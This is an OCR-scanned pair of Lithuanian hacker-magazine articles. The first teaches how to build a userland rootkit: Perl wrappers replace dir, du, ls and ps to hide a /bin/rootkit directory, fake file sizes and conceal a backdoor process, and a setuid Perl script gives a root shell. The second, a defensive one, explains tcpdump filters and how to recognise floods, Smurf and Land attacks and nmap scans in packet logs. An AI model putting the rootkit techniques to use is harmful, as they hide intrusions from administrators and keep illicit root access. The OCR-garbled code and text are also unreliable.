KIASVORIUS ROOTKITUS. KARTAIS PAKAN- 
KA PANAUDOTI ELEMENTARIUS DALYKĖLIUS, 
KURIUOS REALIZUOTI GALI KIEKVIENAS. 


Elementaraus 
nebranduolinio rootkito sukūrimas 


[Pradžių pradžia] Manau, jog iš pradžių reikėtų išsi 
aiškinti, kas iš viso yra tas rootkitas ir kuo branduoli 
niai rootkitai skiriasi nuo savo non-kernel brolių. Jei 
gu pamąstyti šiek tiek abstrakčiai, tuomet rootkitas 
tai priemonė, leidžianti užsimaskuoti sistemoje ir iš 
aikyti maksimalias teises aktyviai naudojant nulauž 
tą kompiuterį. 

Branduolinis rootkitas tai užkraunamas sistemos 
branduolio modulis, kuris perima vartotojo sistemi- 
nius iškvietimus, tuo pačiu kontroliuodamas ir slėp 
damas nuo administratoriaus informaciją apie ne 
teisėtus veiksmus. Paprastai skirtingiems branduo 
liams reikalingi skirtingi rootkitai, kadangi skirtingo- 
se sistemose naudojami skirtingi rootkito kontroliuo- 
jami funkcijų adresai. O šiame straipsnyje aš papa- 
sakosiu apie tai, kaip parašyti nesudėtingą nebran- 
duolinį rootkitą, kuris nuo pašalinių akių paslepia 
savo bylas, paleistus procesus ir prisijungimus prie 
bekdoro. 

Iš karto pasakysiu, kad norėdami nuslėpti rootkito bu- 
vimą sistemoje, mes neperrašinėsime tokių koman- 
dų, kaip /s, ps ir netstat. Mes pasielgsime kur kas pa- 
prasčiau, nors tai ir nėra visiškai saugu tiesiog pa- 
keisime šiuos įrankius skriptais, kurie apdoros iš kon- 
solės perduodamus parametrus, nukreips juos origi- 
naliam įrankiui, gaus iš jo atsakymą, jį apdoros ir išves 
vartotojui galutinį nufiltruotą rezultatą. 


„ATA 


d 4 


Taigi pradėsim. Kaip jau prieš tai minėjau, aš nesiruošiu perra 
šyti sistemos komandų aš tiesiog jas perkelsiu į katalogą su 
į akį nekrentančių pavadinimu, pavyzdžiui, /bin/sysctl, vietoje jų 
palikdamas savadarbius skriptus-aplinkas, kurie valdys siste 
minių komandų veikimą. Savaime suprantama, toks skriptas 
nėra labiausiai užmaskuotas: bet kokia antitrojanų sistema mus 
tuojau pat aptiks. Taigi reikia suprasti, jog viskas, apie ką aš 
pasakoju, panaudojama menkai apsaugotuose serveriuose II 
visų pirma yra tiesiog įdomi praktika. 


[Pradėsime programuoti] Pradėsime nuo programų, kurios pa 
slepia būsimo rootkito bylas, sukūrimo. Tai reiškia, jog mums 
reikia pakeisti tokias komandas, kaip /s, dir bei du, ir vietoje jų 
įdėti nuosavus skriptus-aplinkas. Pradėsime nuo dir ir du, ka- 
dangi jas parašyti šiuo atveju kur kas paprasčiau 


okiam nors kintamajam priskirsime kelią iki katalogo, kuriame 
bus saugomi originalūs įrankiai ir kai kurios paties rootkito by 


Beje, 
56. Visų pirma, reikia parašyti kodą, kuris galėtų patikrinti gau 
namus Įėjimo parametrus-argumentus. Tai reiškia, kad jeigu 
kažkas paleis komandą dir su parametru /bin/rootkit, tai vietoje 
atsakymo jam bus pateikti ne mūsų katalogo atributai, 0 pra 


ši eilutė bus praktiškai Visose mūsų būsimo rootkito bylo 


iešimas, informuojantis apie tai, jog toks katalogas neegzis 
tuoja. Tokį kodą parūpint juokų darbas: 


JuVImo Vieta sisteminiuose kal 


tikriname kiekviena paleidimo parametru masyvo elemento 


ootkit“ A 


(Sarą 64 
bin/tootkit 


arą e “/bin/rootkit/") 


sų katalogui su rootkitu), tuomet darom štai ka 


siap astintii derina 


Į kintamąjį $sher įrašomi visi duomenys, kuriuos pateikia dir 
Dabar prieš išvedant duom 
juose nėra informacijos apie mūsų rootkito bylas. Tai reiškia, 


| 


Bnis vartotojui reik 


a patikrint, ar 


kad jeigu vartotojas paleis komandą dir /bin, atsakyme jis netu 
ri pamatyti katalogo /bin/rootkit. 
Mes mūsų kode apsistojome ties ta vieta, kurioje | Sdir įraši 


me komandos dir išvedamus duomenis. Dabar šiuos duomei 
reikia protingai apdoroti ir išvesti vartotojui: 
1411 t) 7 pagal 2 torpu kaidome Sd KEIIOS Elll 
radedame duomenu patikrinima ju prireiks, pok 
Scount- ( 
loreach Sd d 
iz Skit pat dir | 1001 
Sdirz rootkit/)R8(Spwd in“) 4 Sdirz kame „roo!l 
(Scaun! calar((?dirz) )4 print “Sdir | 
pint  5dZ 
Ką gi, galiu tave nudžiugint komandos di mus 
duomenis valdantis skriptas paruoštas darbui. Telieka 0 
ginalią komandą perkelti į katalogą /bin/rootkit, o vietoje 
originalios komandos pakišti ką tik mūsu sukurtą progra 
mą. Vėliau, tai yra po to, kai visos mūsų rootkito bylos bus 


paruoštos, tu jas turėsi paslėpti. Tuo atveju, jeigu nemoki 


Perl arba moki, bet menkai, tau prireiks mokėjimo progra 


muoti copy £ paste metodu ir šiek tiek pataisyti kelius i 


programų p 
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[Griebsimės „du“] Pereisime prie kitos komandos du. Aš 
čia neaprašinėsiu viso kodo: algoritmą jau visi suprato. Visų 
pirma patikriname argumentus, po to paleidžiame programą, 
gauname atsakyma, jį apdorojame ir išvedame vartotojui. Ko 
mandos du skripto skeletu gali pabūti mūsų dir komandai skir 
tas skriptas. O dabar pagrindinis dalykas: komandos du ir Is 
pateikia informaciją apie bylos dydį sistemoje bei kai kuriuos 
kiekvienai bylai individualius atributus. Tai reiškia, kad jeigu kas 
nors įvykdys komandą du /bin arba Is -I /bin, tuomet mūsų 
rootkitas veikiausiai bus aptiktas, kadangi visų mūsų perdarytų 
įrankių dydis nesutaps su originalų dydžiu. Būtent tai mums ir 
reikia nuslėpti. Pradėsim. 

Kadangi slepiamų bylų sąrašas — individualus ir kintamas da- 
lykas, tai būtų racionalu sukurti universalų kodą, į kurį bet ku- 
riuo metu būtų galima ką nors greitai pridėti, o svarbiausia, kad 
visa tai veiktų. Taigi visų pirma programoje mes sukursime ma- 
syvą su bylų pavadinimais, kurių informaciją reikia pakeisti: 
ust/bin/du"); 


Dfake tools= (“/us:/bin/dir" 


Po to parašysime universalią visoms byloms skirtą funkciją: 
Funkcija, pakeičianti informacija apie modifikuotas bylas i pradinę 
sub checkz ( 
c0tak= split(A//, Stoke); pagal „/“ suskaidome kelia iki modifikuotos 
f (scalar((e>fak) 3) Stak[3] = Sfak[2];Sfak[2] = Sfak[1]) 
/Sfakl "/Stak[1/Sfak[2]") 


komandos 


( (Sarg eų "Sfake")) ( 


du Skit poth/Sfak[3]; / gauname duomenis apie originalą 
(Dediz Sdiz) 
f (Sduz —/Sfok[3]/) 
print “Sediz[0NŠfok[3/M" ;exit(); | 2 išvedome dali duomenu apie originalų 
f (Sduz= - "Stake") ( print “Sediz[0NSfakan"; oxit(); | 


Absoliučiai toki pati koda galima realizuoti ir komandai Is. Tie 
sa, teks šiek tiek pataisyti jau suklastotos /s išvedamus duome 
nis. 


[Trys dalys paruoštos] Sveikinu, trečioji mūsų rootkito dalis 
jau paruošta. Dabar mes pereisime prie pagrindinio dalyko, t.y. 
prie mūsų procesų nuslėpimo. Tam reikia sukurti komandai ps 
skirta aplinka: 


Komandai „ps“ skirta oplinka 

4 Vusi/bin/perl 

Skit path "/bin/rootkit" 

Sproc "Klogb"; 7 bekdoro proceso pavadinimas sistemoje 
St=0 


if (Šps —/Spioc/)  Sps X slepiame slaptoji ją 
if (Sps /Skit pat Ian “4 7 įeigu paleistas procesas 
4 1andasi slaptame tuome! so ame ir įi 
if ((Sps= —/pail/) k G /ps/))(Sps="7) 4 paleidus /bin/ps, sistemoje 
atsiranda 2 nauji procesai: perl /bin/ps ir ps, iai, ašaliname ir juos 
if (Sps /Skit „path Vps/) 4 
Dpss foreach Spss((ė)pss) 4 vietoje /bin/rootkit/ps rašome tiesiog „ 


/ps/)(Spss-"ps"3S 
scalar((o>pss)) | print "Spss" | 
e (print "Spss *;1);] 


Ąą 1 ne" 1 
Else į pan PS į į 


Viskas! Komandai ps skirta aplinka paruošta naudojimui. Pato- 
gumo dėlei teliko sukurti darbui sistemoje skirtą skriptą, kuris, 
pavyzdžiui, leistų greitai gauti shellą suid teisėmis. Aš nuspren- 
džiau neišradinėti dviračio ir tiesiog pateiksiu skripta, kuris jau 
buvo pateiktas viename iš ankstesnių numerių: 


4 Vusi/bin/suidperl  U 
foreach Sarg((eDARGV) 1 


if (Sarg 64 “-suid 10x“) į 
while (1)4 

print “(root K20wned] 
chomp(Scmd -— < STDIN >) 
pit Scmd'; | 


) 
else 1 print "No such file or directonAn“; exit() | 
1 
| 


Tiesa, nepamiršk šiam skriptui priskirti +s veliaveles :). 


[Nieko nepamiršome?] Kaip matai, nieko sudėtingo! Siek tiek 
fantazijos 
komplektą, 


ir rootkitas paruoštas. Diske tu rasi pilną rootkito 
į kurį įeina skriptai-aplinkos komandoms du, dir, Is, 
find, locate, netstat ir ps. Taip, nie- 
ko nepamiršome? 
Bičiuli mano, pamiršom! Įsivaizduok, 
jog kažkas sugalvos išmėginti koman 
dą cat /bin/Is. Kas tada atsitiks? Jis 
pamatys mūsų per! sknptą Ir tuojau 
pat supras visą klasta! Taigi kad taip 
nenutiktų, reikia visus mūsų per! skrip 
tus tiesiog sukompiliuoti | dvejetaines 
bylas su komanda perlcc, kuri yra vi 
sose unix sistemose. Dabar bet kas, 
davęs komanda cat /bin/ls, tiesiog pa 
matys daugybę keistų simbolių. 


piliuoto per! skripto viduna 


s privilegijos 
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Analizuojame tinklo kraują 


KOMPIUTERIŲ TINKLAS PRIMENA KRAUJO- 
TAKOS SISTEMĄ, O JAME JUDANTYS PAKE- 
TAI GALI BŪTI SULYGINTI SU TROMBOCI- 
TAIS, LEUKOCITAIS IR KITOMIS KRAUJO 
LASTELĖMIS. TAČIAU NE VISKAS, KAS YRA 
KRAUJYJE, NAUDINGA. KARTAIS Į KRAUJĄ 
PAPUOLA UZKRATAS, KURIS STENGIASI VI- 
SAIP PAKENKTI ARBA NET NUZUDYTI VISĄ 
ORGANIZMĄ. NORINT LAIKU APTIKTI IR PA- 
ŠALINTI SUNEGALAVIMĄ, BŪTINA PRIDUO- 
TI KRAUJĄ TYRIMAMS. SIEKIANT ANALOGIS- 
KŲ TIKSLŲ REIKĖTŲ ANALIZUOTI IR „TIN- 
KLO KRAUJĄ“. STANDARTINIS TOKIOS ANA- 
LIZĖS ĮRANKIS *NIX TIPO SISTEMOSE YRA 
TCPDUMP.. 


„Tepdump“ galimybės nuo A iki Z 
[Virtuoziškas komandinės eilutės opcijų valdymas| 
Tcpdump įrankis faktiškai yra tinklo paketų analizatorius, kurį 
sukūrė Lawrence Berkeley National Laboratory. Jeigu paleistu 
me tcpdump be jokių parametrų, tai jis periminės visus tinklo 
paketus ir išvedinės informaciją apie juos. Su parametru -i ga 
lima nurodyti tinklo sąsają, iš kurios reiktų priiminėti duomenis: 


4 tapdump i eth2 
Taip bus perimami per eth2 sąsają keliaujantys paketai. Jeigu 
reikia tik tų paketų, kurie siunčiami arba gaunami iš tam tikro 
tinklo mazgo, tai jo vardą arba IP adresą reikia nurodyti po rak- 
tinio žodžio host: 

4 tcpdump host namestV 
Jeigu tau reikalingi tik tie paketai, kuriais keičiasi, pavyzdžiui, 
kompiuteriai namesrv1 ir namesrv2, tai galima panaudoti tokį 
filtrą: 


4 tcpdump host namesiv1 and namesiv2 


Norint stebėti tik išeinančius iš kokio nors tinklo mazgo pake- 
tus, reikia nurodyti frazę „src host“: 


4 tapdump sic hosi namesiy 


B 


k 


O norint sekti tik įeinančius paketus, reikia nurodyti „dst host“: 


4 tepdump dst host namesrų 


Raktiniai žodžiai „src port“ ir „dst port“ leidžia nurodyti siuntėjo 
ir gavėjo jungtis, pavyzdžiui: 


4 tepdump dst port 513 


Jeigu reikia sekti vieną iš trijų protokolų (tcp, udp, icmp), tai jo 
pavadinimą tiesiog galima nurodyti komandinėje eilutėje. Su 
loginiais operatoriais and (ša), or (||) ir not (!) galima aprašyti 
pageidaujamo sudėtingumo filtrus. Žemiau pateikiamas filtro 
pavyzdys, kuris stebi tik ICMP paketus, ateinančius iš išorinio 
tinklo: 


4 tepdump icmp and not sic net localne! 


Galima tikrinti konkrečius protokolų antraščių bitus arba baitus, 
tam naudojamas toks formatas: proto|expr:size], kur proto 
vienas iš protokolų: ether, fddi, tr, ip, arp, rarp, tcp, udp, icmp 
arba ip6; exDr — poslinkis baitais nuo paketo antraštės pra- 
džios; size — papildomas laukas, nurodantis, kiek baitų peržiū- 
rinėti (jo gali ir nebūti, tuomet peržiūrinėjamas 1 baitas). Pavyz- 
džiui, norint atrinkinėti tik tuos TCP segmentus, kuriuose nuro- 
dyta SYN vėliavėlė, reikia naudoti tokį filtrą: 


4 tgpdumę "tep[ 13 ]- =2 


Čia reikia žinoti, kad nuo trylikto TCP antraštės baito yra 8 vėlia- 
vėlių bitai (1 baitas), o SYN šiame baite yra antras bitas. Ka- 
dangi jis turi būti lygus 1, tai vėliavėlių baitas dvejetainiu pavi- 
dalu atrodys štai taip: 00000010 (2 dešimtainėje sistemoje). 
Su argumentu -c galima nurodyti priimamų paketų kiekį: 


4 pdump < 10 


Taip mes gausime viso labo 10 paketu. Parametras -a leidžia 
(jeigu įmanoma) IP adresą atvaizduoti simboliškai, t.y. išvesti 
vardą vietoje adreso (tiesa, tai smarkokai sulėtina įrankio dar- 
bą): 


4 tepdump 0 


Su vėliavėle -wwv galima gauti maksimalų išvedamos informaci 
jos kiekį. Mažiau informacijos išveda vėliavėlės -v ir -w. Apie 
visas įmanomas opcijas galima sužinoti tepdump(8) dokumen- 
tacijoje (manual pages). 


[„Tepdump“ išvedamos informacijos formatavimas] Kiek- 
vienos listingo eilutės pradžioje tepdump išveda laika, kuris pa- 
teikiamas tokiu formatu: hh:mm:ss.frac, kur frac sekundės 
dalys. Po laiko gali būti nurodyta sąsaja, kuri priima paketus, 
pavyzdžiui, ethO, eth1, lo ir panašiai. Užrašas ethO< reiškia, 
kad sąsaja ethO paketus priima. Atitinkamai užrašas ethO> 
reiškia, kad paketai siunčiami iš sąsajos ethO. Tolimesni duo- 
menys priklauso nuo priimamo paketo tipo (ARP/RARP TCR UDP 


[HAKERIS 01 [32] 06 


52! 


[HAKERIS 401 [32] 06 


"Rest Bloca Ikos "Iocaidonain: 
File Sessioni Settings Heip 


5 5:11.560125 et+O 
5 ) win 4096 
580126 etho 


troot > Teprvian 


7053421347 
S 2477765723134777 
X253:34776 
5 2778RA6 34778 


34778756121347 78 


„580126 eh 
405 win 4035 
111,580126 ethd 


5 2477340393;34779 

S 3478719694;347B)| 
2478062291:34780 

S 2478124319:74781 

S 2476170435:34781 

5 3478222373;347621 | 

1 14 ia " Ho 3476301576;34783 

in 402 


2.23.115.22,90; S 3 


72.23,115.22,66: $ 3 


; 5 3475019634:347 
; S 27867291:247862) 
3475124719;3478124 | | 
; S 3478178453476178" 
+ 5 M4PRO223035 478272 | 
1576;2476301| 


5 Ta78311944;3478 6 


Pav.3. Land ataka 


NBR ATP). Toliau pateiksiu kai kurių pagrindinių paketų tipų for- 
matus. 
1. TCP paketai 

si. port > dst.port: flags dota--segno ack window Urgent options 
src.port ir dst.port — tai paketo siuntėjo ir gavėjo IP adresai bei 
jungtys. flags — TCP paketo antraštėje nustatytos vėliavėlės. 
Tai gali būti S (SYN), F (FIN), P (PUSH), R (RST) simbolių kom- 
binacijos, taip pat šiame lauke gali būti vienas taškas, kuris 
reiškia, kad nustatytų vėliavėlių nėra. 
data-segno — aprašo duomenis, kurie pakete saugomi štai 
tokiu formatu: first:lastinbytes), kur first ir last — pirmojo ir 
paskutinio paketo baito sekos numeriai, o nbytes — duomenų 
baitų kiekis. Jeigu nbytes parametras lygus nuliui, tai first ir last 
sutampa. 
ack — kitas iš eilės sekos numeris (ISN + 1). 
window — lango dydis. 
urgent — parodo, kad pakete siunčiami skubūs duomenys (vė- 
liavėlė URG). 
options — čia gali būti nurodomi papildomi duomenys, pavyz- 
džiui, <mss 1024> (maksimalus segmento dydis). 


2. UDP paketai 


sic.port > dst.port: udp nbyles 


172,31,200 „200 
» 172.23,115.22 


221 10mp! eiho reest UK) 
icmp: echo reply (K) 
p echo reauett (IF) 
echo rep My (r 


ia5i 15.554642 eo 
2,142510 et) 
S Mikio su 


reguest (5 
cmp; echo reply UK) 
pr echo reguost (DF) 
1 echo replų (IF) 
Pi echo ieiaėsi (IF 
br echo repiu A 


AG 
1:018881 etho 
21.018881 ethd 
„648711 ethO) 
4 „45711 et) 


IF) 
įcapi teho pbesyrgė 1 
icspį echo reest (UK) 
mi echo replų (IK: 

- reauest (IK 


X „169346 sthė  replų (IF) 
„793246 ethA > reguest (DF) | 
765246 stho > replų (IF — 

145:75,428157 ethD egusi (DF Si 
145:25.478132 etrA „lų (IF 14 


172.23 


23.115.22.285: < 
Už 


192.168,.106.5 2830 172 
= 1460.r0p.N0p „ak 
> 172.23.115.22.2889 192, 168,10 


132.168.10.35,2891 > 172.23.115.22.657: $ 347933526;3478 
as 1460,N0p,nop,„teckūko (IK) 
172,.23.115.22,657 132,168.16,35.2891: 


„35.2890: R 


Pav.4. Tinklo mazgo 172.23.115.22 TCP skenavimas 


udp - žymė, parodanti tai, jog vyksta UDP paketų analizė. 
nbytes — UDP pakete perduodamų duomenų baitų kiekis. 


3. ICMP paketai 
stc > dst: icmp: type 


icmp — žymė, identifikuojanti ICMP tipo paketą. 
type — ICMP pranešimo tipas, pavyzdžiui, echo reguest arba 
echo reply. 


[Mokomės „tcpdump“ listinguose atpažinti atakas] Kai kKu- 
rios tinklinės atakų ir įsilaužimo aptikimo sistemos (NIDS) nau- 
doja tcpdump sukurtus protokolavimo žurnalus, tačiau dabar 
mes pasimokysime savarankiškai tcpdump listinguose atpažinti 
pagrindinius atakų tipus. 

Pirmajame paveikslėlyje parodytas tcpdump listingas, kuriame 
užfiksuota SYN Flood DoS ataka prieš tinklo mazgą, kurio IP 
adresas 172.23.115.22. Apie tai byloja daugybė SYN užklau- 
sų į vieną jungtį (80/tcp) per labai trumpą laiko tarpą (dešimtys 
užklausų per vieną ir tą patį laiką: 13:15:11.580126). 
Antrajame paveikslėlyje užfiksuota paskirstyta DoS ataka (DD0S) 
ICMP flooding (flood ping). Iš pirmojo žvilgsnio galima pagalvoti, 
kad tai paprasčiausias tam tikro tinklo mazgo pinginimas, ka- 
dangi čia tiesiog priimami /CMP echo reguest pranešimai, o 
vietoje atsakymo į juos siunčiami JCMP echo reply pranešimai. 


Labai jau didelis užklausų kiekis per tokį trumpą laiko tarpą, be 
to, visos šios užklausos ateina iš skirtingų IP adresų. 
Trečiajame paveikslėlyje matosi, kad IP adresai ir siuntėjo bei 
gavėjo jungtys sutampa — tai akivaizdus Land atakos požy- 
mis. Land užklausų antplūdis sukelia užsiciklinimą, gali ata- 
kuojamą mazgą visiškai išvesti iš rikiuotės. Ilgokai buvo mano- 
ma, jog ši ataka kartu su pasenusiomis sistemomis galutinai 
iškeliavo istorijos užmarštin, tačiau viso pasaulio bugtrag'ai 
ne taip senai pranešė, jog aptikta galimybė atlikti Land ataką 
prieš Windows Server 2003 ir Windows XP SP2 sistemas. De- 
rėtų pastebėti, jog egzistuoja kelios šios atakos modifikacijos, 
pavyzdžiui, Latierra — kuomet paketai siunčiami vienu metu į 
iš karto keletą jungčių. 

Ketvirtajame paveikslėlyje galima pastebėti daugybę bandymų 
užmegzti TCP susijungimus su skirtingomis tinklo mazgo 
172.23.115.22 jungtimis. Daugelis įrašų atrodo štai taip: 


12:00:17.899408 eih0 < 192.168.10.35.2878 > 172.23.115.22.340: S 
3477705342:3477705342 (0) win 64240 < mss 1460,n0p,nop,sackOK > (DF) 

12:00:17.899408 ethO - 172.23.115.22.340 - 192.168.10.35.2878: R 0:0 (0) ack 
3477705343 win O (DF) 


Pirmojoje eilutėje perduodama TCP SYN užklausa, o antrojoje 
vietoje atsakymo išsiunčiami TCP RST paketai — tai byloja apie 
tai, kad prisijungti prie šios jungties neimanoma. Listinge taip 
pat galima rasti tokią įrašų grandinę: 


12:00:17.899408 eth0 < 192.168.10:35.2879 - 172.23.115.22.ssh: S 
3477765723:3477765723 (0) win 64240 + mss 1460,nop,nop,sackOK > (DF) 

12:00:17.899408 eih0 > 172.23.115.22.ssh > 192.168.10.35.2879: S 
3567248280:3567248280 (0) ack 3477765724 win 5840 < mss 1460,nop,nop,sackOK >> 
(DF) 

12:00:17.899408 eth0 < 192,168.10.35.2879 > 172.23.115.22.ssh: . 1:1(0) ack 1 
win 64240 (DF) 

12:00:17.899408 eih0 < 192.168.10.35.2879 - 
3477765724:3477765724(0) win O (DF) 


172.23.115.22.ssh: R 


Čia viskas analogiškai: pirmoje eilutėje į mazgo ssh jungtį 
(22/tcp) perduodama SYN užklausa. Po to kitoje eilutėje 
parodyta, jog mazgas 172.23.115.22 išsiunčia atsakymą 
su nurodytomis vėliavėlėmis SYN ir ACK, tuo pačiu TCP pa- 
keto antraštėje Acknowledgment Number lauko reikšmė pa- 
didinta vienetu (3477765723+1). Trečioje eilutėje maz- 
gas 192.168.10.35 patvirtina atsakymo gavimą. O pasku- 
tinėje eilutėje susijungimą nutraukia mazgas 
192.168.255.20, kuris pasiunčia RST. Taip trigubas TCP 
rankos paspaudimas (TCP three-way handshake) nebuvo 
atliktas korektiškai. Ketvirtame paveikslėlyje užfiksuotas 
172.23.115.22 mazgo skenavimas. 

Labai tikėtina, jog čia dirba nmap skeneris (su nurodyta vėliavė- 
le -sT), kadangi jungčių, į kurias ateina užklausos, numeriai 
nėra didinami nuosekliai vienetu, kaip tai daro daugelis kitų 
skenerių, o visiškai atsitiktiniu būdu (nors taip elgtis moka ne 
vien tik nmap). 

Penktajame paveikslėlyje pateiktas listingas panašus į ankstes- 
nį. I mazgą 172.20.100.100 atkeliauja SYN užklausos, o apti- 
kus uždarą jungtį vietoje atsakymo siunčiami paketai su RST 
vėliavėlė. Tačiau reakcija į atviras jungtis skiriasi nuo prieš tai 
pateikto listingo: 


12:44:17.899408 eth0 < 192.168.99.200.2879 
1045782751:1045782751 (0) win 4096 

12:00:17.899408 eihO > 172.20.100.100.http > 192.168.99.200.2879- 5 
2341745720:2341745720 (0) ack 1045782752 win 5840 < mss 1460 (DF) 

12:00:17.899408 eth0 < 192.168.99.200.2879  172.20.100.100.http: R 
1045782752:1045782752 (0) win O 


. 172.20.100.100.hnp: S 


Pastebėtina, jog vietoje atsakymo į SYN užklausą grąžinamas 
paketas su nustatytomis vėliavėlėmis SYN ir ACK, po ko susi- 
jungimas nutraukiamas pasiunčiant vėliavėlę RST. Tai reiškia, 
jog trijų etapu rankos paspaudimas nebuvo pilnai atliktas 
vadinasi, 172.20.100.100 mazgo jungtys skenuojamos neuž- 
baigto atviro seanso (half-open scanning) arba, kaip ji dar vadi- 
na, slapto (stealth) TCP SYN skenavimo metodu (nmap vėliavė- 
lė -sS). 

Šeštajame paveikslėlyje pateiktame listinge į skirtingas jungtis 
atkeliauja UDP paketai, kuriuose duomenų kiekis lygus O. Tai 
akivaizdus požymis, jog šiuo metu vykdomas UDP skenavimas. 
Jeigu jungtis uždaryta, tai mazgas išsiunčia ICMP pranešimą 
port unreachable. Jeigu toks pranešimas nėra išsiunčiamas, tai 
reiškia, jog jungtis yra atidaryta. 

Pastebėsiu, jog O duomenų baitų UDP skėnavimo metu siunčia 
nmap skeneris (su nurodyta vėliavėlė -sU), o kiti skeneriai gali 
išsiųsti didesnį duomenų baitų kiekį. Pavyzdžiui, Xspider kiek- 
viename pakete siunčia 3 baitus. 

Listinge gali būti daug užklausų, kuriose nėra nurodyta nė viena 
vėliavėlė (flags lauke yra taškas), pavyzdžiui: 


Pav.6. UDP skenavimas 


53) 


[HAKERIS 401 [32] 06 


54| 


[ĮHAKERIS 01 [32] 06 


02:12:59.899408 eth0 < 10.15.100.6.41343 
971654054:971654054(0) win 2048 

02:12:59.899408 ethO -- 192.168.2.4.30310 - 10.15.100.6.41343: R 0:0(0) ack 
971654054 win O (DF) 

02:12:59.899408 erhO 
971654054:971654054(0) win 3072 


+ 192.168.2.4.30310: . 


10.15.100.6.41343 192.168.2.4.275: | 


Tai nėra normali būsena, nes atliekamas nu// skenavimas (nmap 
vėliavėlė -sN). 

FIN skenavimą (nmap vėliavėlė -sF) lengva aptikti pagal daugy- 
bę gaunamų paketų su nurodyta vėliavėle FIN: 


04:17:40.580653 eihO < 192.168.10.35.46598 > 172.23.115.22.fip: F 1918335677- 
1918335677(0) win 2048 

04:17:40.580653 eth0 < 192.168.10.35.46599 >> 172.23.115.22 ftp: F 1918337777: 
1918337777(0) win 3072 


Skenavimas „kalėdinės eglutės“ principu (TCP Xmas Tree scan, 
nmap vėliavėlė -sX) nustatomas pagal daugybę užklausų su 
nurodytomis vėliavėlėmis FIN, URG ir PUSH. Jeigu jungtis užda- 
ryta, tai vietoje atsakymo siunčiamas paketas su vėliavėle RST: 


03:22:46.960653 eth0 < 192.168.10.35.55133 > 172.23.115.22.19150: FP 
1308848741:1308848741 (0) win 2048 ug O 

03:22:46.960653 eth0 > 172.23.115.22.19150 > 192.168.10.35.55133- R 0:0(0) 
ack 1308848741 win O (DF) 

03:22:46.960653 eth0 < 192.168.10.35.55133 
1308848741:1308848741 (0) win 3072 ug O 


+ 172.23.115.22.smtp: FP 


Taip pat egzistuoja skenavimas su ACK paketais (nmap vė- 
liavėlė -sA). Šis metodas naudojamas, siekiant išsiaiškinti 
ugniasienės taisykles. | skenuojamo mazgo jungtis siunčia- 
mi paketai su nurodyta ACK vėliavėle. Jeigu vietoje atsaky- 
mo gaunami paketai su RST vėliavėle, tai jungtys klasifi- 
kuojamos kaip ugniasienės nefiltruojamos (unfiltered). Jei- 
gu negaunamas joks atsakymas, jungtis laikoma filtruoja- 
ma (filtered). Siekdamas patvirtinimo, skeneris užklausą 
siunčia du kartus, 0 tcpdump listingas tokiu atveju atrodo 
maždaug taip: 


13:44:46.361688 eth0 < 192.168.91.130.56528 
1114201130:1114201130(0) ack O win 2048 

13-44:46.361688 eth0 > 172.18.10.23.30310 > 192.168.91.130.56528: R 0:0(0) 
win O (DF) 

13:44:46,361688 eth0 < 192.168.91.130.56528 
1114201130:1114201130(0) ack O win 3072 

13:44:46.361688 eth0 ->172.18.10.23.275 — 192168.91.130.56528: R 0:0(0) win O (DF) 

13:44:46.361688 eth0 < 192.168.91.130.56528 > 172.18.10.23.nntp: = 
11142011301114201130(0) ack O win 2048 


- 172.18.10.23.30310: . 


» 172.18.10.23.275; . 


Septintame paveikslėlyje parodyta Smurf ataka. Hakeris į 
172.23.115.0 tinklą aukos (192.168.10.14) vardu siunčia 
transliuojančią (broadcasting) ICMP užklausą (echo reguest). 
Kiekvienas transliuojančią užklausą gavęs tinklo kompiuteris 
(listinge parodytas tik mazgas 172.23.115.1) generuoja at- 
sakymą (echo reply) aukos adresu, dėl ko ir sukeliamas atsi- 
sakymas aptarnauti (Denial of Service — DoS). Periodinis 
užklausos pakartojimas leidžia kartoti ataką prieš tinklo mazgą 


192.168.10.1. Tepdump po sąsajos pavadinimo (ethO) su 
B opcija perspėja, jog vyksta transliuojančios užklausos pri- 
ėmimas. Yra viena Smurf atakos atmaina, kuri vadinasi Frag- 
gle (skeveldrinė granata), kurioje naudojamas UDP o ne ICMP 
protokolas: 


08:34:18.899408 ethO B 192.168.10.22.34904 > 172.23.115.255.echo: udp 64 
08:34:18.899408 eih0 — 172.23.115.255.echo > 192.168.10.22.34904: udp 64 
08:34:18.520602 ethO B 192.168.10.22.34904 > 172.23.115.255.echo: udp 64 


Atakuojantysis suklastotus UDP paketus siunčia į transliuojantį 
sustiprinančio tinklo adresą (paprastai į echo jungti 7/udp). Kiek- 
viena tinklo sistema, kurioje leidžiama atsakinėti į echo pake- 
tus, grąžina atsakymą sistemai-aukai, dėl ko bus sugeneruota 
daug tinklo srauto. 
Kartais ateinančiuose paketuose gali būti nurodytos nestandar- 
tinės vėliavėlių kombinacijos, pavyzdžiui, viena kitai prieštarau- 
jančios vėliavėlės SF (SYN+FIN), kur SYN užmezga ryšį, o FIN jį 
nutraukia. Taip pat gali būti nurodytos rezervinės vėliavėlės [EC- 
N-Echo, CWR] ir iš eilės einančios FIN vėliavėlės be prieš tai 
buvusių SYN. Pavyzdžiui: 

11:16:22:899931 eth0 = 192.168.10.35.2879 > 172.23.115.22.491: 5F 
3477765723:3477765723 (0) win 1024 

11:16:22:899931 eth0 < 192.168.10.35.2880 > 172.23.115.22.1351: S [ECNE- 
cho, CWR] 3477800253:3477800253 (0) win 4096 

11:16:22:899931 ethO < 192.168.10.35.2881 
3477835208:3477835208 (0) win 4096 


- 172.23.115.22.2880: SFR 


Tokias užklausas piktavalis gali panaudoti dviem tikslais. Vi- 
sų pirma, nestandartinės vėliavėlių kombinacijos gali išvesti 
tinklo mazgą iš rikiuotės arba taip leisti apeiti atakų aptikimo 
sistemas ir ugniasienes. Antra, nestandartinės vėliavėlės nau- 
dojamos tinklo mazgo OS identifikuoti. Skirtingos operacinės 
sistemos skirtingai reaguoja į RFC standartus neatitinkan- 
čius paketus — šias galimybes praktikuoja nmap. gueso ir 
kiti įrankiai. 


23:45:15 ,520602 < 172,.31,200, 
23:45;18.520602 ethO > 172,23,115, 
23;45;19,142510 ethO < 192,168,13, 
23:45;19.142510 ethO > 172,23,115, 
23;45:19,764397 ethO < 10,0,2,13 

23:45:19,764397 ethO > 172,23,115, 
23:45:20,.389106 ethO < 192,168,10, 
23;45;20.389106 ethO > 172,23,115, 
23:45;21,.018881 ethO < 10,16,0,11£ 
23:45;21,018881 ethO > 172,23,115, 
23;45:21,648711 ethO < 192,168,1.1 
23:45:21,648711 ethO > 172,23,115. 
23:45:22,278660 ethO < 10,0,2,13 

23;45:22.278660 ethO > 172,.23,115, 
23;45;22,908522 ethO < 172,.31,200, 


Pav.7. Smurf ataka 


TTTT 


" 


